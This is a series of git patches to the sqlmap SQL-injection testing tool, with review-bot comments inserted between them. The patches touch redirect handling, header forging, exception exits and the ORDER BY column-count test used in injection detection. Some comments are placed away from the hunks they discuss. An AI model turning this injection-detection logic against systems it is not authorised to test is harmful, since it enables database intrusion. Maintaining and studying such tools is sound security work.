lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -30b479368e2a9d72b055753ef3a5a740 lib/core/settings.py +d909ef19b43548c3e7eb332c0ee495b0 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From 241f7321de78d4c49bca0255b004c7d42621d2d6 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 26 Mar 2018 15:39:48 +0200 Subject: [PATCH 092/428] Proper patch related to the #3009 --- lib/core/option.py | 2 +- lib/core/settings.py | 2 +- lib/request/basic.py | 2 +- lib/request/connect.py | 2 +- txt/checksum.md5 | 8 ++++---- 5 files changed, 8 insertions(+), 8 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 902f702b451..63582f5d995 100644 --- a/lib/core/option.py +++ b/lib/core/option.py 
@@ -2359,7 +2359,7 @@ def _checkTor(): logger.info(infoMsg) try: - page, _, _ = Request.getPage(url="https://check.torproject.org/", referer=None, raise404=False) + page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False) except SqlmapConnectionException: page = None diff --git a/lib/core/settings.py b/lib/core/settings.py index 76fc6700cec..0ff4f01f6e1 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.43" +VERSION = "1.2.3.44" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/basic.py b/lib/request/basic.py index 14e461946ae..6e82b2da1cf 100644 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -61,7 +61,7 @@ def forgeHeaders(items=None, base=None): if items[_] is None: del items[_] - headers = OrderedDict(base or conf.httpHeaders) + headers = OrderedDict(conf.httpHeaders if base is None else base) headers.update(items.items()) class _str(str): diff --git a/lib/request/connect.py b/lib/request/connect.py index df045c3cf4d..dc2714bf2ce 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -346,7 +346,7 @@ def getPage(**kwargs): requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str # Prepare HTTP headers - headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host}) + headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host}, base=None if target else {}) if HTTP_HEADER.COOKIE in headers: cookie = headers[HTTP_HEADER.COOKIE] diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b056b99ec68..9534c76a4f5 100644 
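Review bot: The `base` contract of `forgeHeaders` changes in the basic.py hunk — an empty dict used to fall through to `conf.httpHeaders` via `or`, now only `None` does — and the connect.py hunk relies on exactly that with `base=None if target else {}` so configured headers are not attached to non-target requests such as the Tor check; neither site says so, and the next person to "simplify" `conf.httpHeaders if base is None else base` back to `base or ...` would silently reopen the leak. Suggest a comment on the connect.py line, `# non-target requests (e.g. connectivity checks) get an empty header base so conf.httpHeaders is not sent to third-party hosts`, and a sentence in the forgeHeaders docstring stating that `base=None` selects `conf.httpHeaders` while `{}` means no base headers. Both enclosing functions start outside their hunks.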
--- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -838f38559c01a690cc04620cb15692ab lib/core/option.py +b7c3e98e5400d73e9ce5c1a30145f7c6 lib/core/option.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d909ef19b43548c3e7eb332c0ee495b0 lib/core/settings.py +3f186f4f5322acd57c659532090d11ba lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -66,9 +66,9 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py -53c38db67dd4b14fbceee71e4748f874 lib/request/basic.py +7e8e0a3fdebbe443832c1bab2f8d3869 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -bf97dd285be3cc341233a9f4e09137f8 lib/request/connect.py +a42707d6e89312659d3bdc8fb4ad1336 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py From 45fb5ab4a57d77b0c598a08d80dc2c299faa9d25 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Wed, 28 Mar 2018 15:13:33 +0200 Subject: [PATCH 093/428] Patch for cases when http: is immediatelly being redirected to https: --- lib/controller/checks.py | 10 ++++++++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 13 insertions(+), 3 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 06a395bcaee..adaff389e79 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1539,6 +1539,16 @@ def checkConnection(suppressOutput=False): else: kb.errorIsNone = True + + threadData = getCurrentThreadData() + + if kb.redirectChoice == REDIRECTION.YES and threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID: + if conf.hostname in threadData.lastRedirectURL[1] and threadData.lastRedirectURL[1].startswith("https://"): + conf.url = re.sub(r"https?://", "https://", conf.url) + match = re.search(r":(\d+)", threadData.lastRedirectURL[1]) + port = match.group(1) if match else 443 + conf.url = re.sub(r":\d+/", ":%s/" % port, conf.url) + except SqlmapConnectionException, ex: if conf.ipv6: warnMsg = "check connection to a provided " diff --git a/lib/core/settings.py b/lib/core/settings.py index 0ff4f01f6e1..467cfde3b0c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.44" +VERSION = "1.2.3.45" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9534c76a4f5..1aeffc85ebd 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
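Review bot: `conf.hostname in threadData.lastRedirectURL[1]` is a substring test, so a redirect to a different host whose URL merely contains the hostname (in its domain or query string) still flips `conf.url` to https, and the two `re.sub` calls are unanchored and unbounded: the scheme substitution rewrites every `http://` in `conf.url` including ones inside parameter values, while `r":\d+/"` only applies the redirect's port when `conf.url` already spells out a port, so `http://host/path` redirected to `https://host:8443/` ends up on 443 (and a `:8080/` embedded in a query value would be rewritten instead). Parsing the redirect authority once, comparing the host exactly and rewriting only the authority of `conf.url` with `count=1` addresses all three; the rewrite below does that with `re` alone. It assumes `conf.hostname` holds the bare host as it appears in the URL — a bracketed IPv6 literal would need the host class widened. checkConnection's body continues outside the hunk.
```python
        threadData = getCurrentThreadData()

        if kb.redirectChoice == REDIRECTION.YES and threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID:
            redirect = threadData.lastRedirectURL[1]
            # exact match on the redirect target's host, not a substring test over the whole URL
            match = re.match(r"(?i)https://(?P<host>[^/:?#]+)(?::(?P<port>\d+))?", redirect)
            if match and match.group("host").lower() == (conf.hostname or "").lower():
                port = match.group("port") or "443"
                # rewrite only the scheme and authority of the target URL, never its path or query
                conf.url = re.sub(r"(?i)^https?://[^/:?#]+(?::\d+)?", "https://%s:%s" % (conf.hostname, port), conf.url, count=1)
        # … unchanged: except SqlmapConnectionException handling …
```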
@@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -6f0db0b505eec576e28d97cced3ad338 lib/controller/checks.py +a2369719ca192945945971bfcffb42e9 lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3f186f4f5322acd57c659532090d11ba lib/core/settings.py +2dba7f74fccee64374b4efde5b8245a4 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From c7329cb03baabf753b97d08037ab34b649b6ba29 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 28 Mar 2018 15:23:14 +0200 Subject: [PATCH 094/428] Probable patch for #3013 and similar Issues --- lib/core/settings.py | 2 +- sqlmap.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 467cfde3b0c..dbfd3ba4004 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.45" +VERSION = "1.2.3.46" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/sqlmap.py b/sqlmap.py index d8c236da193..0dbe6827a20 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -305,7 +305,7 @@ def main(): logger.error(errMsg) raise SystemExit - elif "valueStack.pop" in excMsg and kb.get("dumpKeyboardInterrupt"): + elif kb.get("dumpKeyboardInterrupt"): raise SystemExit elif any(_ in excMsg for _ in ("Broken pipe",)): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1aeffc85ebd..217a3369f0f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2dba7f74fccee64374b4efde5b8245a4 lib/core/settings.py +d843a0bbe94135258b29d10609e96943 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -224,7 +224,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -082aa29ab77c647a0d3830c07279d437 sqlmap.py +ecbd0edbb6ea4cb6e1277ceb294d7819 sqlmap.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py From 16cd13d7dbf3d0b6e49f3a3e6d4e7ca4604c9efa Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 28 Mar 2018 17:24:12 +0200 Subject: [PATCH 095/428] Fixes #3014 --- lib/controller/checks.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index adaff389e79..1dec8cda7d6 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py 
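Review bot: With the `"valueStack.pop" in excMsg` condition dropped, the new `elif kb.get("dumpKeyboardInterrupt"): raise SystemExit` in main() exits silently on any unhandled exception once that flag has been set (presumably by an interrupted dump), not only on the traceback it was meant to suppress, so a genuine crash after the interrupt is hidden from both the user and the log. Keep the quiet exit for that case but record what was swallowed first, e.g. `logger.debug("exiting quietly after keyboard interrupt during dump: %s" % excMsg)` before `raise SystemExit`, so the masked exception remains recoverable from verbose output. main() continues outside the hunk.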
@@ -1543,7 +1543,7 @@ def checkConnection(suppressOutput=False): threadData = getCurrentThreadData() if kb.redirectChoice == REDIRECTION.YES and threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID: - if conf.hostname in threadData.lastRedirectURL[1] and threadData.lastRedirectURL[1].startswith("https://"): + if conf.hostname in (threadData.lastRedirectURL[1] or "") and threadData.lastRedirectURL[1].startswith("https://"): conf.url = re.sub(r"https?://", "https://", conf.url) match = re.search(r":(\d+)", threadData.lastRedirectURL[1]) port = match.group(1) if match else 443 diff --git a/lib/core/settings.py b/lib/core/settings.py index dbfd3ba4004..c4e8a11c04c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.46" +VERSION = "1.2.3.47" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 217a3369f0f..f9792c9c647 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -a2369719ca192945945971bfcffb42e9 lib/controller/checks.py +0ee74789b09bb40e8f48baddefe21724 lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d843a0bbe94135258b29d10609e96943 lib/core/settings.py +0e8b52de032cee17c76e1e01e2e15f88 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From f0677d88b7af59d7c94a11002a69dea9539ac3d3 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 29 Mar 2018 14:22:46 +0200 Subject: [PATCH 096/428] Trivial update --- lib/core/settings.py | 2 +- lib/techniques/union/test.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index c4e8a11c04c..ce2d94971eb 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.47" +VERSION = "1.2.3.48" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index dee45c66cb4..35ebc5cb9e5 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py 
@@ -54,7 +54,7 @@ def _orderByTest(cols): query = agent.suffixQuery(query, suffix=suffix, comment=comment) payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where) page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) - return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) + return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1): infoMsg = "'ORDER BY' technique appears to be usable. " diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f9792c9c647..3548a050127 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0e8b52de032cee17c76e1e01e2e15f88 lib/core/settings.py +f4f6c7e5f8265293270273b6415450eb lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py 
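Review bot: The rewritten `return` in _orderByTest packs four conditions into one line and relies on `and` binding tighter than `or` and `is not` binding tighter than both, so a reader has to re-derive that it means "(no error pattern and comparison(...)) or (type-mismatch message present)"; the hunks at L312 and L318 edit this same line again. Naming the two halves makes the intent, and the `not kb.heavyDynamic` term inserted at L312, obvious: `noErrors = not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed"))`, `typeMismatch = re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None`, `return (noErrors and comparison(page, headers, code)) or typeMismatch`. The def of _orderByTest and its enclosing scope start outside the hunk.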
@@ -96,7 +96,7 @@ fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -da5a117fb64723e6c815b0e33d50f66a lib/techniques/union/test.py +d35a42c4144b822debd82c2e66c1dd4d lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py c552f8d924d962a26f2ded250bcea3b8 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py From cdb1e793709022c07fb5c5734d5297c0edec746c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 29 Mar 2018 14:37:33 +0200 Subject: [PATCH 097/428] Disabling ORDER BY tests in heavily dynamic environment --- lib/controller/checks.py | 2 ++ lib/core/option.py | 1 + lib/core/settings.py | 2 +- lib/techniques/union/test.py | 2 +- txt/checksum.md5 | 8 ++++---- 5 files changed, 9 insertions(+), 6 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 1dec8cda7d6..5e6d55ac317 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1168,6 +1168,8 @@ def checkDynamicContent(firstPage, secondPage): warnMsg += "sqlmap is going to retry the request(s)" singleTimeLogMessage(warnMsg, logging.CRITICAL) + kb.heavyDynamic = True + secondPage, _, _ = Request.queryPage(content=True) findDynamicContent(firstPage, secondPage) diff --git a/lib/core/option.py b/lib/core/option.py index 63582f5d995..7ab02a7f675 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1945,6 +1945,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.forcePartialUnion = False kb.forceWhere = None kb.futileUnion = None + kb.heavyDynamic = False kb.headersFp = {} kb.heuristicDbms = None kb.heuristicExtendedDbms = None diff --git a/lib/core/settings.py b/lib/core/settings.py index ce2d94971eb..b58d1d2a598 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
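Review bot: `kb.heavyDynamic = False` is added to _setKnowledgeBaseAttributes without a comment, and the name alone does not say who sets it or what it switches off, so the next reader has to search for it. A one-line comment would do: `kb.heavyDynamic = False  # set by checkDynamicContent() when it falls back to retrying the request(s); checked by _orderByTest() in lib/techniques/union/test.py`. The attribute is renamed to heavilyDynamic in commit 099 (L317), so the comment should move with it. Both _setKnowledgeBaseAttributes and checkDynamicContent start outside their hunks.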
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.48" +VERSION = "1.2.3.49" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index 35ebc5cb9e5..9c6ca87267c 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -54,7 +54,7 @@ def _orderByTest(cols): query = agent.suffixQuery(query, suffix=suffix, comment=comment) payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where) page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) - return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None + return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and not kb.heavyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1): infoMsg = "'ORDER BY' technique appears to be usable. " diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3548a050127..f76d2ffeea6 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -0ee74789b09bb40e8f48baddefe21724 lib/controller/checks.py +ebc0d5d4e3981c9c57197fa09e37aa91 lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -b7c3e98e5400d73e9ce5c1a30145f7c6 lib/core/option.py +8484e95c616b7a5220157c13e24fa1d6 lib/core/option.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f4f6c7e5f8265293270273b6415450eb lib/core/settings.py +b7dd1e5592efbbfd550047b53014543e lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py 
@@ -96,7 +96,7 @@ fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -d35a42c4144b822debd82c2e66c1dd4d lib/techniques/union/test.py +07882f244fc73e130ab1a17caa6f5fb0 lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py c552f8d924d962a26f2ded250bcea3b8 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py From ae8699f258d78ce6f8804bb9d0e8ccc04b8b6377 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 29 Mar 2018 14:47:30 +0200 Subject: [PATCH 098/428] Reducing false-positive 'appears' messages in heavily dynamic environment --- lib/controller/checks.py | 4 ++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 3 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 5e6d55ac317..925804a26f2 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -514,6 +514,10 @@ def genCmpPayload(): kb.matchRatio = _ logger.debug("adjusting match ratio for current parameter to %.3f" % kb.matchRatio) + # Reducing false-positive "appears" messages in heavily dynamic environment + if kb.heavyDynamic and not Request.queryPage(reqPayload, place, raise404=False): + continue + injectable = True elif threadData.lastComparisonRatio > UPPER_RATIO_BOUND and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)): diff --git a/lib/core/settings.py b/lib/core/settings.py index b58d1d2a598..a3e399806e6 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
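Review bot: The new `if kb.heavyDynamic and not Request.queryPage(reqPayload, place, raise404=False): continue` drops a candidate that the match-ratio logic just above had accepted, but leaves no trace of why, so a parameter reported as not injectable on a heavily dynamic target cannot be told apart from one that never matched. A debug line before the `continue`, e.g. `logger.debug("dropping injection candidate after re-check in heavily dynamic environment")`, keeps the decision auditable in verbose output at no extra cost. The check also costs one extra request per candidate, which the comment above it could state. The enclosing loop and function start outside the hunk; the hunk header's genCmpPayload appears to be only the nearest preceding def.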
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.49" +VERSION = "1.2.3.50" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f76d2ffeea6..4a24291ae54 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -ebc0d5d4e3981c9c57197fa09e37aa91 lib/controller/checks.py +28c80dd4b8f288f46388770415d7c1df lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b7dd1e5592efbbfd550047b53014543e lib/core/settings.py +30cc59cf0722d37effce632dcd38dc62 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From 8a90512354984011151a1876dd9c058d973ba8a2 